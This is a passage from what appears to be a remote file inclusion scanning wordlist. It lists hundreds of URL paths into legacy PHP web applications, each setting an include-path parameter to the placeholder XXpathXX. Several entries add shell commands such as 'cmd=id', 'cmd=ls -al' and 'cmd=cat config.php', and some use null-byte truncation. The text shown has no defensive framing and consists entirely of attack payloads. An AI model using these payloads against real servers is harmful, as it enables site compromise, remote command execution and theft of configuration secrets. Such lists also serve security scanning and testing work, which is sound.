-/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=XXpathXX
-/modules/mod_calendar.php?absolute_path=XXpathXX
-/modules/mod_flatmenu.php?mosConfig_absolute_path=XXpathXX
-/modules/mod_mainmenu.php?mosConfig_absolute_path=XXpathXX
-/modules/mod_weather.php?absolute_path=XXpathXX?
-/modules/mx_smartor/admin/admin_album_otf.php?phpbb_root_path=XXpathXX?
-/modules/newbb_plus/config.php?bbPath[root_theme]=XXpathXX
-/modules/newbb_plus/votepolls.php?bbPath[path]=XXpathXX
-/modules/news/blocks/latest_news.php?system[path]=XXpathXX
-/modules/newusergreatings/pm_newreg.php?exbb[home_path]=XXpathXX?
-/modules/organizations/index.php?full_path=XXpathXX
-/modules/phones/index.php?full_path=XXpathXX
-/modules/pms/index.php?module_path=XXpathXX???
-/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=XXpathXX
-/modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=XXpathXX
-/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=XXpathXX?
-/modules/presence/index.php?full_path=XXpathXX
-/modules/projects/index.php?full_path=XXpathXX
-/modules/projects/list.php?full_path=XXpathXX
-/modules/projects/summary.inc.php?full_path=XXpathXX
-/modules/punish/p_error.php?exbb[home_path]=XXpathXX?
-/modules/punish/profile.php?exbb[home_path]=XXpathXX?
-/modules/reports/index.php?full_path=XXpathXX
-/modules/search/index.php?full_path=XXpathXX
-/modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=XXpathXX?
-/modules/settings/headerfile.php?system[path]=XXpathXX
-/modules/snf/index.php?full_path=XXpathXX
-/modules/syslog/index.php?full_path=XXpathXX
-/modules/tasks/index.php?full_path=XXpathXX
-/modules/tasks/searchsimilar.php?full_path=XXpathXX
-/modules/tasks/summary.inc.php?full_path=XXpathXX
-/modules/threadstop/threadstop.php?exbb[home_path]=XXpathXX?
-/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=XXpathXX
-/modules/tml/block.tag.php?GLOBALS[PTH][classes]=XXpathXX
-/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=XXpathXX
-/modules/useradm/index.php?full_path=XXpathXX
-/modules/users/headerfile.php?system[path]=XXpathXX
-/modules/vWar_Account/includes/functions_common.php?vwar_root2=XXpathXX
-/modules/visitors2/include/config.inc.php?lvc_include_dir=XXpathXX?
-/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=XXpathXX
-/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=XXpathXX
-/modules/xfsection/modify.php?dir_module=XXpathXX
-/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=XXpathXX
-/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=XXpathXX
-/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=XXpathXX?
-/modulistica/mdl_save.php?CLASSPATH=XXpathXX
-/modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=XXpathXX?
-/moodle/admin/utfdbmigrate.php?cmd=XXpathXX
-/moosegallery/display.php?type=XXpathXX?&cmd=[command]
-/mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosConfig_absolute_path=XXpathXX
-/moteur/moteur.php?chemin=XXpathXX?
-/movie_cls.php?full_path=XXpathXX
-/msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=XXpathXX
-/music/buycd.php?HTTP_DOCUMENT_ROOT=XXpathXX?
-/mutant_includes/mutant_functions.php?phpbb_root_path=XXpathXX
-/mxBB/modules/kb_mods/includes/kb_constants.php?module_root_path=XXpathXX
-/mxBB/modules/mx_newssuite/includes/newssuite_constants.php?mx_root_path=XXpathXX
-/mygallery/myfunctions/mygallerybrowser.php?myPath=XXpathXX
-/myphpcommander_path/system/lib/package.php?gl_root=XXpathXX?cmd
-/mysave.php?file=XXpathXX
-/naboard_pnr.php?skin=XXpathXX?
-/ncaster/admin/addons/archive/archive.php?adminfolder=XXpathXX
-/network_module_selector.php?path_prefix=XXpathXX
-/news.php?CONFIG[script_path]=XXpathXX?
-/news.php?config[root_ordner]=XXpathXX?&cmd=id
-/news.php?scriptpath=XXpathXX?
-/news.php?vwar_root=XXpathXX
-/news/include/createdb.php?langfile;=XXpathXX?
-/news/include/customize.php?l=XXpathXX?
-/news/newstopic_inc.php?indir=XXpathXX
-/news/scripts/news_page.php?script_path=XXpathXX?
-/newsadmin.php?action=XXpathXX
-/newsarchive.php?path_to_script=XXpathXX?&cmd=ls
-/newsfeeds/includes/aggregator.php?zf_path=XXpathXX
-/newsfeeds/includes/controller.php?zf_path=XXpathXX
-/newsletter/newsletter.php?waroot=XXpathXX
-/newsp/lib/class.Database.php?path=XXpathXX?
-/newticket.php?lang=XXpathXX
-/noah/modules/noevents/templates/mfa_theme.php?tpls[1]=XXpathXX
-/noticias.php?inc=XXpathXX?
-/nucleus/plugins/skinfiles/index.php?DIR_LIBS=XXpathXX
-/nuke_path/iframe.php?file=XXpathXX
-/nukebrowser.php?filnavn=XXpathXX&filhead=XXpathXX&cmd=id
-/nuseo/admin/nuseo_admin_d.php?nuseo_dir=XXpathXX?
-/oaboard_en/forum.php?inc=XXpathXX
-/ocp-103/index.php?req_path=XXpathXX
-/ocs/include/footer.inc.php?fullpath=XXpathXX?
-/ocs/include/theme.inc.php?fullpath=XXpathXX?
-/ocs/openemr-2.8.2/custom/import_xml.php?srcdir=XXpathXX?
-/olbookmarks-0.7.4/themes/test1.php?XXpathXX
-/oneadmin/adminfoot.php?path[docroot]=XXpathXX
-/oneadmin/blogger/sampleblogger.php?path[docroot]=XXpathXX?
-/oneadmin/config-bak.php?include_once=XXpathXX
-/oneadmin/config.php?path[docroot]=XXpathXX
-/oneadmin/ecommerce/sampleecommerce.php?path[docroot]=XXpathXX?
-/online.php?config[root_ordner]=XXpathXX?&cmd=id
-/open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=XXpathXX?
-/openi-admin/base/fileloader.php?config[openi_dir]=XXpathXX
-/openrat/themes/default/include/html/insert.inc.php?tpl_dir=XXpathXX???
-/opensurveypilot/administration/user/lib/group.inc.php?cfgPathToProjectAdmin=XXpathXX
-/ops/gals.php?news_file=XXpathXX
-/order/login.php?svr_rootscript=XXpathXX
-/osData/php121/php121db.php?php121dir=XXpathXX%00
-/ossigeno-suite-2.2_pre1/upload/xax/admin/modules/uninstall_module.php?level=XXpathXX?
-/ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=XXpathXX?
-/owimg.php3?path=XXpathXX
-/p-news.php?pn_lang=XXpathXX
-/pafiledb/includes/pafiledb_constants.php?module_root_path=XXpathXX
-/page.php?goto=XXpathXX
-/page.php?id=XXpathXX
-/panel/common/theme/default/header_setup.php?path[docroot]=XXpathXX
-/param_editor.php?folder=XXpathXX?
-/parse/parser.php?WN_BASEDIR=XXpathXX
-/patch/?language_id=XXpathXX
-/patch/tools/send_reminders.php?noSet=0&includedir=XXpathXX?
-/paypalipn/ipnprocess.php?INC=XXpathXX?
-/pda/pda_projects.php?offset=XXpathXX
-/phfito/phfito-post?SRC_PATH=XXpathXX
-/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=XXpathXX
-/photo_comment.php?toroot=XXpathXX
-/php-inc/log.inc.php?SKIN_URL=XXpathXX
-/php-include-robotsservices.php?page=XXpathXX
-/php-nuke/modules/Forums/admin/admin_styles.php?phpbb_root_path=XXpathXX
-/php.incs/common.inc.php?cm_basedir=XXpathXX?
-/php/init.gallery.php?include_class=XXpathXX/something
-/php121db.php?php121dir=XXpathXX%00
-/php4you.php?dir=XXpathXX?
-/phpAdsNew-2.0.7/libraries/lib-remotehost.inc?phpAds_geoPlugin=XXpathXX?
-/phpBB2/shoutbox.php?phpbb_root_path=XXpathXX
-/phpCards.header.php?CardPath=XXpathXX?
-/phpGedView/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=XXpathXX
-/phpMyChat.php3?=XXpathXX?cmd=id
-/phpMyConferences_8.0.2/common/visiteurs/include/menus.inc.php?lvc_include_dir=XXpathXX?
-/phpQLAdmin-2.2.7/ezmlm.php?_SESSION[path]=XXpathXX?
-/phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=XXpathXX
-/phpbb/sendmsg.php?phpbb_root_path=XXpathXX
-/phpcalendar/includes/calendar.php?phpc_root_path=XXpathXX?
-/phpcalendar/includes/setup.php?phpc_root_path=XXpathXX?
-/phpdebug_PATH/test/debug_test.php?debugClassLocation=XXpathXX
-/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=XXpathXX
-/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=XXpathXX
-/phphd_downloads/common.php?phphd_real_path=XXpathXX
-/phphost_directoryv2/include/admin.php?rd=XXpathXX?
-/phphtml.php?htmlclass_path=XXpathXX
-/phpi/edit_top_feature.php?include_connection=XXpathXX
-/phpi/edit_topics_feature.php?include_connection=XXpathXX
-/phplib/site_conf.php?ordnertiefe=XXpathXX
-/phplib/version/1.3.3/functionen/class.csv.php?tt_docroot=XXpathXX
-/phplib/version/1.3.3/functionen/produkte_nach_serie.php?tt_docroot=XXpathXX
-/phplib/version/1.3.3/functionen/ref_kd_rubrik.php?tt_docroot=XXpathXX
-/phplib/version/1.3.3/module/hg_referenz_jobgalerie.php?tt_docroot=XXpathXX
-/phplib/version/1.3.3/module/produkte_nach_serie_alle.php?tt_docroot=XXpathXX
-/phplib/version/1.3.3/module/ref_kd_rubrik.php?tt_docroot=XXpathXX
-/phplib/version/1.3.3/module/referenz.php?tt_docroot=XXpathXX
-/phplib/version/1.3.3/module/surfer_aendern.php?tt_docroot=XXpathXX
-/phplib/version/1.3.3/module/surfer_anmeldung_NWL.php?tt_docroot=XXpathXX
-/phplib/version/1.3.3/standard/1/lay.php?tt_docroot=XXpathXX
-/phplib/version/1.3.3/standard/3/lay.php?tt_docroot=XXpathXX
-/phplinks/includes/smarty.php?full_path_to_public_program=XXpathXX
-/phporacleview/inc/include_all.inc.php?page_dir=XXpathXX?
-/phppc/poll.php?is_phppc_included=1&relativer_pfad=XXpathXX?
-/phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=XXpathXX?
-/phppc/poll_sm.php?is_phppc_included=1&relativer_pfad=XXpathXX?
-/phpquickgallery/gallery_top.inc.php?textFile=XXpathXX
-/phpreactor/inc/polls.inc.php?pathtohomedir=XXpathXX?
-/phpreactor/inc/updatecms.inc.php?pathtohomedir=XXpathXX?
-/phpreactor/inc/users.inc.php?pathtohomedir=XXpathXX?
-/phpreactor/inc/view.inc.php?pathtohomedir=XXpathXX?
-/phpress/adisplay.php?lang=XXpathXX
-/phpunity-postcard.php?plgallery_epost=1&gallery_path=XXpathXX?
-/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=XXpathXX
-/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=XXpathXX
-/phpyabs/moduli/libri/index.php?Azione=XXpathXX
-/pirvate/ltwpdfmonth.php?ltw_config['include_dir]=XXpathXX
-/playlist.php?phpbb_root_path=XXpathXX
-/plugin/HP_DEV/cms2.php?s_dir=XXpathXX?
-/plugin/gateway/gnokii/init.php?apps_path[plug]=XXpathXX?
-/plugins/1_Adressbuch/delete.php?folder=XXpathXX
-/plugins/BackUp/Archive.php?bkpwp_plugin_path=XXpathXX?
-/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=XXpathXX?
-/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=XXpathXX?
-/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=XXpathXX?
-/plugins/links/functions.inc?_CONF[path]=XXpathXX
-/plugins/polls/functions.inc?_CONF[path]=XXpathXX
-/plugins/rss_importer_functions.php?sitepath=XXpathXX?
-/plugins/safehtml/HTMLSax3.php?dir[plugins]=XXpathXX?
-/plugins/safehtml/safehtml.php?dir[plugins]=XXpathXX?
-/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=XXpathXX
-/plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=XXpathXX
-/plugins/spamx/EditHeader.Admin.class.php?_CONF[path]=XXpathXX
-/plugins/spamx/EditIP.Admin.class.php?_CONF[path]=XXpathXX
-/plugins/spamx/EditIPofURL.Admin.class.php?_CONF[path]=XXpathXX
-/plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=XXpathXX
-/plugins/spamx/Import.Admin.class.php?_CONF[path]=XXpathXX
-/plugins/spamx/LogView.Admin.class.php?_CONF[path]=XXpathXX
-/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=XXpathXX
-/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=XXpathXX
-/plugins/spamx/MassDelTrackback.Admin.class.php?_CONF[path]=XXpathXX
-/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=XXpathXX
-/plugins/staticpages/functions.inc?_CONF[path]=XXpathXX
-/plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=XXpathXX
-/plume-1.1.3/manager/tools/link/dbinstall.php?cmd=ls&_PX_config[manager_path]=XXpathXX
-/plus.php?_pages_dir=XXpathXX?
-/pmapper-3.2-beta3/incphp/globals.php?_SESSION[PM_INCPHP]=XXpathXX?
-/pmi_v28/Includes/global.inc.php?strIncludePrefix=XXpathXX
-/pmi_v28/Includes/global.inc.php?strIncludePrefix=XXpathXX?
-/podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=XXpathXX
-/podcastgen1.0beta2/core/admin/admin.php?p=admin&absoluteurl=XXpathXX
-/podcastgen1.0beta2/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl=XXpathXX
-/podcastgen1.0beta2/core/admin/categories_add.php?absoluteurl=XXpathXX
-/podcastgen1.0beta2/core/admin/categories_remove.php?absoluteurl=XXpathXX
-/podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=XXpathXX
-/podcastgen1.0beta2/core/admin/editdel.php?p=admin&absoluteurl=XXpathXX
-/podcastgen1.0beta2/core/admin/ftpfeature.php?p=admin&absoluteurl=XXpathXX
-/podcastgen1.0beta2/core/admin/login.php?absoluteurl=XXpathXX
-/podcastgen1.0beta2/core/admin/pgRSSnews.php?absoluteurl=XXpathXX
-/podcastgen1.0beta2/core/admin/showcat.php?absoluteurl=XXpathXX
-/podcastgen1.0beta2/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl=XXpathXX
-/podcastgen1.0beta2/core/archive_cat.php?absoluteurl=XXpathXX
-/podcastgen1.0beta2/core/archive_nocat.php?absoluteurl=XXpathXX
-/podcastgen1.0beta2/core/recent_list.php?absoluteurl=XXpathXX
-/poll/view.php?int_path=XXpathXX
-/pollvote.php?pollname=XXpathXX?&cmd=ls
-/pop.php?base=XXpathXX
-/popup_window.php?site_isp_root=XXpathXX?
-/port.php?content=XXpathXX
-/portal/includes/portal_block.php?phpbb_root_path=XXpathXX
-/portal/portal.php?phpbb_root_path=XXpathXX?
-/portfolio.php?id=XXpathXX
-/portfolio/commentaires/derniers_commentaires.php?rep=XXpathXX?
-/post_static_0-11/_lib/fckeditor/upload_config.php?DDS=XXpathXX
-/prepare.php?xcart_dir=XXpathXX?
-/prepend.php?_PX_config[manager_path]=XXpathXX
-/preview.php?php_script_path=XXpathXX?&cmd=dir
-/principal.php?conteudo=XXpathXX
-/print.php?page=XXpathXX
-/print.php?pager=XXpathXX
-/print.php?print=XXpathXX?
-/process.php?DEFAULT_SKIN=XXpathXX
-/professeurs/index.php?repertoire_config=XXpathXX
-/profil.php?config[root_ordner]=XXpathXX?&cmd=id
-/projects/weatimages/demo/index.php?ini[langpack]=XXpathXX
-/promocms/newspublish/include.php?path[bdocroot]=XXpathXX
-/protection.php?logout_page=XXpathXX?
-/provider/auth.php?xcart_dir=XXpathXX?
-/psynch/nph-psa.exe?css=XXpathXX
-/psynch/nph-psf.exe?css=XXpathXX
-/public_html/add-ons/modules/sysmanager/plugins/install.plugin.php?AURORA_MODULES_FOLDER=XXpathXX?
-/public_html/modules/Forums/favorites.php?nuke_bb_root_path=XXpathXX?
-/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=XXpathXX
-/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=XXpathXX
-/qsgen_0.7.2c/qlib/smarty.inc.php?CONFIG[gameroot]=XXpathXX?
-/qsgen_0.7.2c/server_request.php?CONFIG[gameroot]=XXpathXX?
-/qte_web.php?qte_web_path=XXpathXX?
-/quick_reply.php?phpbb_root_path=XXpathXX&mode=[file]
-/quickie.php?QUICK_PATH=XXpathXX?&cmd=id
-/random2.php?path_to_folder=XXpathXX
-/randshop/index.php?incl=XXpathXX?
-/rdf.php?page[path]=XXpathXX?&cmd=ls
-/reactivate.php?base_dir=XXpathXX
-/read.php?data=XXpathXX?
-/readmore.php?config["sipssys"]=XXpathXX
-/recent.php?insPath=XXpathXX
-/rechnung.php?_PHPLIB[libdir]=XXpathXX?
-/reconfig.php?GLOBALS[CLPath]=XXpathXX
-/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=XXpathXX
-/redirect.php?url=XXpathXX
-/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=XXpathXX
-/register.php?base_dir=XXpathXX
-/releasenote.php?mosConfig_absolute_path=XXpathXX
-/rempass.php?lang=XXpathXX
-/report.php?scriptpath=XXpathXX?
-/reports/who_r.php?bj=XXpathXX
-/resources/includes/class.Smarty.php?cfg[sys][base_path]=XXpathXX
-/ressourcen/dbopen.php?home=XXpathXX?
-/robotstats.inc.php?DOCUMENT_ROOT=XXpathXX?
-/root/public/code/cp_html2txt.php?page=XXpathXX
-/routines/fieldValidation.php?jssShopFileSystem=XXpathXX
-/rspa/framework/Controller_v4.php?__ClassPath=XXpathXX
-/rspa/framework/Controller_v4.php?__ClassPath=XXpathXX?
-/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=XXpathXX
-/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=XXpathXX?
-/rss.php?page[path]=XXpathXX?&cmd=ls
-/rss.php?phpraid_dir=XXpathXX
-/rss.php?premodDir=XXpathXX
-/rss2.php?page[path]=XXpathXX?&cmd=ls
-/run.php?dir=SHELL?&file=XXpathXX
-/s01.php?shopid=XXpathXX
-/s01.php?shopid=XXpathXX?
-/s02.php?shopid=XXpathXX?
-/s03.php?shopid=XXpathXX?
-/s04.php?shopid=XXpathXX?
-/sablonlar/gunaysoft/gunaysoft.php?icerikyolu=XXpathXX
-/sablonlar/gunaysoft/gunaysoft.php?sayfaid=XXpathXX
-/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=XXpathXX
-/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=XXpathXX?
-/sample/xls2mysql/parser_path=XXpathXX?
-/save.php?file_save=XXpathXX
-/saveserver.php?thisdir=XXpathXX
-/script//ident/index.php?path_inc=XXpathXX
-/script/_conf/core/common-tpl-vars.php?confdir=XXpathXX?
-/script/common.inc.php?path_inc=XXpathXX
-/script/gestion/index.php?path_inc=XXpathXX
-/script/ident/disconnect.php?path_inc=XXpathXX
-/script/ident/ident.inc.php?path_inc=XXpathXX
-/script/ident/identification.php?path_inc=XXpathXX
-/script/ident/loginliste.php?path_inc=XXpathXX
-/script/ident/loginmodif.php?path_inc=XXpathXX
-/script/index.php?path_inc=XXpathXX
-/script/init/createallimagecache.php?PATH_TO_CODE=XXpathXX
-/script/menu/menuadministration.php?path_inc=XXpathXX
-/script/menu/menuprincipal.php?path_inc=XXpathXX
-/script/param/param.inc.php?path_inc=XXpathXX
-/script/plugins/phpgacl/admin/index.php?path_inc=XXpathXX
-/script/template/index.php?main_page_directory=XXpathXX
-/script/tick/allincludefortick.php?PATH_TO_CODE=XXpathXX
-/script/tick/test.php?PATH_TO_CODE=XXpathXX
-/script_path/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=XXpathXX?
-/script_path/cms/classes/openengine/filepool.php?oe_classpath=XXpathXX?
-/script_path/installation/index.php?mosConfig_absolute_path=XXpathXX?
-/script_path/pgvnuke/pgvindex.php?DOCUMENT_ROOT/header.php=XXpathXX
-/scripts/check-lom.php?ETCDIR=XXpathXX
-/scripts/gallery.scr.php?GLOBALS[PTH][func]=XXpathXX?
-/scripts/lom_update.php?ETCDIR=XXpathXX
-/scripts/news.scr.php?GLOBALS[PTH][classes]=XXpathXX?
-/scripts/polls.scr.php?GLOBALS[PTH][classes]=XXpathXX?
-/scripts/rss.scr.php?GLOBALS[PTH][classes]=XXpathXX?
-/scripts/search.scr.php?GLOBALS[PTH][classes]=XXpathXX?
-/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=XXpathXX
-/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=XXpathXX?
-/scripts/weigh_keywords.php?ETCDIR=XXpathXX
-/scripts/xtextarea.scr.php?GLOBALS[PTH][spaw]=XXpathXX?
-/search.php?config["sipssys"]=XXpathXX
-/search.php?id=XXpathXX
-/search.php?insPath=XXpathXX
-/search/submit.php?config["sipssys"]=XXpathXX
-/search_wA.php?LIBPATH=XXpathXX
-/searchbot.php?path=XXpathXX
-/security/include/_class.security.php?PHPSECURITYADMIN_PATH=XXpathXX
-/sendstudio/admin/includes/createemails.inc.php?ROOTDIR=XXpathXX?
-/sendstudio/admin/includes/send_emails.inc.php?ROOTDIR=XXpathXX?
-/senetman/html/index.php?page=XXpathXX
-/services.php?page=XXpathXX
-/services/samples/inclusionService.php?CabronServiceFolder=XXpathXX%00
-/settings.php?P[includes]=XXpathXX
-/settings_sql.php?path=XXpathXX
-/setup/inc/database.php?tcms_administer_site=XXpathXX
-/setup/upgrader.php?RootDirectory=XXpathXX
-/sezhoo/SezHooTabsAndActions.php?IP=XXpathXX
-/shop/includes/header.inc.php?dateiPfad=XXpathXX
-/shop/index.php?action=XXpathXX?&cmd=cat%20config.php
-/shop/page.php?osCsid=XXpathXX?
-/shop/page.php?pageid=XXpathXX?
-/shoutbox.php?language=XXpathXX
-/shoutbox.php?root=XXpathXX?cmd=id
-/show.php?file=XXpathXX
-/show.php?id=XXpathXX
-/show.php?page=XXpathXX
-/show.php?path=XXpathXX
-/show_archives.php?cutepath=XXpathXX?
-/sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=XXpathXX
-/sid=XXpathXX
-/signer/final.php?smiley=XXpathXX?
-/signin.php?sent=1&AMG_serverpath=XXpathXX
-/sinagb.php?fuss=XXpathXX
-/sinapis.php?fuss=XXpathXX
-/sitebar/Integrator.php?file=XXpathXX
-/sitebar/index.php?writerFile=XXpathXX
-/sitebuilder/admin/top.php?admindir=XXpathXX
-/sitemap.xml.php?dir[classes]=XXpathXX
-/skin/board/default/doctype.php?dir=XXpathXX
-/skin/dark/template.php?path=XXpathXX
-/skin/gold/template.php?path=XXpathXX
-/skin/html/table.php?pachtofile=XXpathXX
-/skin/original/template.php?path=XXpathXX
-/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=XXpathXX
-/skins/advanced/advanced1.php?pluginpath[0]=XXpathXX
-/skins/default.php?dir_inc=XXpathXX
-/skins/header.php?ote_home=XXpathXX
-/skins/phpchess/layout_admin_cfg.php?Root_Path=XXpathXX
-/skins/phpchess/layout_cfg.php?Root_Path=XXpathXX
-/skins/phpchess/layout_t_top.php?Root_Path=XXpathXX
-/skysilver/login.tpl.php?theme=XXpathXX?
-/slogin_lib.inc.php?slogin_path=XXpathXX?
-/smarty.php?xcart_dir=XXpathXX?
-/smarty/smarty_class.php?_smarty_compile_path=XXpathXX
-/smilies.php?config=XXpathXX
-/snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=XXpathXX?
-/snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=XXpathXX?
-/snort/base_stat_common.php?BASE_path=XXpathXX
-/social_game_play.php?path=XXpathXX?
-/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=XXpathXX
-/song.php?phpbb_root_path=XXpathXX
-/source.php?bibtexrootrel=XXpathXX?
-/source/mod/rss/channeledit.php?Codebase=XXpathXX
-/source/mod/rss/post.php?Codebase=XXpathXX
-/source/mod/rss/view.php?Codebase=XXpathXX
-/source/mod/rss/viewitem.php?Codebase=XXpathXX
-/sources/Admin/admin_cats.php?CONFIG[main_path]=XXpathXX
-/sources/Admin/admin_edit.php?CONFIG[main_path]=XXpathXX
-/sources/Admin/admin_import.php?CONFIG[main_path]=XXpathXX
-/sources/Admin/admin_templates.php?CONFIG[main_path]=XXpathXX
-/sources/functions.php?CONFIG[main_path]=XXpathXX
-/sources/help.php?CONFIG[main_path]=XXpathXX
-/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=XXpathXX
-/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=XXpathXX
-/sources/mail.php?CONFIG[main_path]=XXpathXX
-/sources/misc/new_day.php?path=XXpathXX
-/sources/news.php?CONFIG[main_path]=XXpathXX
-/sources/post.php?fil_config=XXpathXX
-/sources/template.php?CONFIG[main_path]=XXpathXX
-/sources/tourney/index.php?page=XXpathXX?
-/spaw/spaw_control.class.php?GLOBALS[spaw_root]=XXpathXX
-/spaw/spaw_control.class.php?spaw_root=XXpathXX
-/speedberg/include/entrancePage.tpl.php?SPEEDBERG_PATH=XXpathXX
-/speedberg/include/generalToolBox.tlb.php?SPEEDBERG_PATH=XXpathXX
-/speedberg/include/myToolBox.tlb.php?SPEEDBERG_PATH=XXpathXX
-/speedberg/include/scriplet.inc.php?SPEEDBERG_PATH=XXpathXX
-/speedberg/include/simplePage.tpl.php?SPEEDBERG_PATH=XXpathXX
-/speedberg/include/speedberg.class.php?SPEEDBERG_PATH=XXpathXX
-/speedberg/include/standardPage.tpl.php?SPEEDBERG_PATH=XXpathXX
-/spellcheckwindowframeset.php?SpellIncPath=XXpathXX
-/squirrelcart/cart_content.php?cart_isp_root=XXpathXX
-/src/ark_inc.php?cfg_pear_path=XXpathXX?
-/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=XXpathXX
-/src/scripture.php?pageHeaderFile=XXpathXX?
-/starnet/themes/c-sky/main.inc.php?cmsdir=XXpathXX?
-/start.php?lang=XXpathXX
-/start.php?pg=XXpathXX
-/stat_modules/users_age/module.php?phpbb_root_path=XXpathXX
-/stats.php?vwar_root=XXpathXX
-/stphpapplication.php?STPHPLIB_DIR=XXpathXX
-/stphpbtnimage.php?STPHPLIB_DIR=XXpathXX
-/stphpform.php?STPHPLIB_DIR=XXpathXX
-/str.php?p=XXpathXX
-/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=XXpathXX
-/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=XXpathXX?
-/strload.php?LangFile=XXpathXX
-/studip-1.3.0-2/studip-htdocs/archiv_assi.php?cmd=ls%20-al&ABSOLUTE_PATH_STUDIP=XXpathXX?
-/studip-1.3.0-2/studip-phplib/oohforms.inc?cmd=ls%20-al&_PHPLIB[libdir]=XXpathXX?
-/styles.php?toroot=XXpathXX
-/styles/default/global_header.php?installed=23&domain=XXpathXX
-/submit_abuse.php?path_prefix=XXpathXX
-/submit_comment.php?path_prefix=XXpathXX
-/subscp.php?phpbb_root_path=XXpathXX?
-/suite/index.php?pg=XXpathXX?
-/supasite/admin_auth_cookies.php?supa[db_path]=XXpathXX
-/supasite/admin_mods.php?supa[db_path]=XXpathXX
-/supasite/admin_news.php?supa[db_path]=XXpathXX
-/supasite/admin_settings.php?supa[include_path]=XXpathXX
-/supasite/admin_topics.php?supa[db_path]=XXpathXX
-/supasite/admin_users.php?supa[db_path]=XXpathXX
-/supasite/admin_utilities.php?supa[db_path]=XXpathXX
-/supasite/backend_site.php?supa[include_path]=XXpathXX
-/supasite/common_functions.php?supa[db_path]=XXpathXX
-/supasite/site_comment.php?supa[db_path]=XXpathXX
-/supasite/site_news.php?supa[db_path]=XXpathXX
-/support/include/open_form.php?include_dir=XXpathXX?cmd=pwd
-/support/index.php?main=XXpathXX
-/surveys/survey.inc.php?path=XXpathXX
-/sw/lib_comment/comment.php?doc_directory=XXpathXX?
-/sw/lib_find/find.php?doc_directory=XXpathXX?
-/sw/lib_session/session.php?doc_directory=XXpathXX?
-/sw/lib_up_file/file.php?doc_directory=XXpathXX?
-/sw/lib_up_file/find_file.php?doc_directory=XXpathXX?
-/sw/lib_user/find_user.php?doc_directory=XXpathXX?
-/sw/lib_user/user.php?doc_directory=XXpathXX?
-/sys/code/box.inc.php?config["sipssys"]=XXpathXX
-/system/ImageImageMagick.php?glConf[path_system]=XXpathXX?
-/system/_b/contentFiles/gBIndex.php?gBRootPath=XXpathXX?
-/system/admin/include/item_main.php?GLOBALS=XXpathXX
-/system/admin/include/upload_form.php?GLOBALS=XXpathXX
-/system/command/admin.cmd.php?GLOBALS=XXpathXX
-/system/command/download.cmd.php?GLOBALS=XXpathXX
-/system/funcs/xkurl.php?PEARPATH=XXpathXX
-/system/includes/pageheaderdefault.inc.php?_sysSessionPath=XXpathXX
-/system/login.php?site_path=XXpathXX
-/tagit2b/tagmin/delTagUser.php?configpath=XXpathXX?
-/tags.php?BBCodeFile=XXpathXX
-/taxonservice.php?dir=XXpathXX?
-/teatro/pub/pub08_comments.php?basePath=XXpathXX
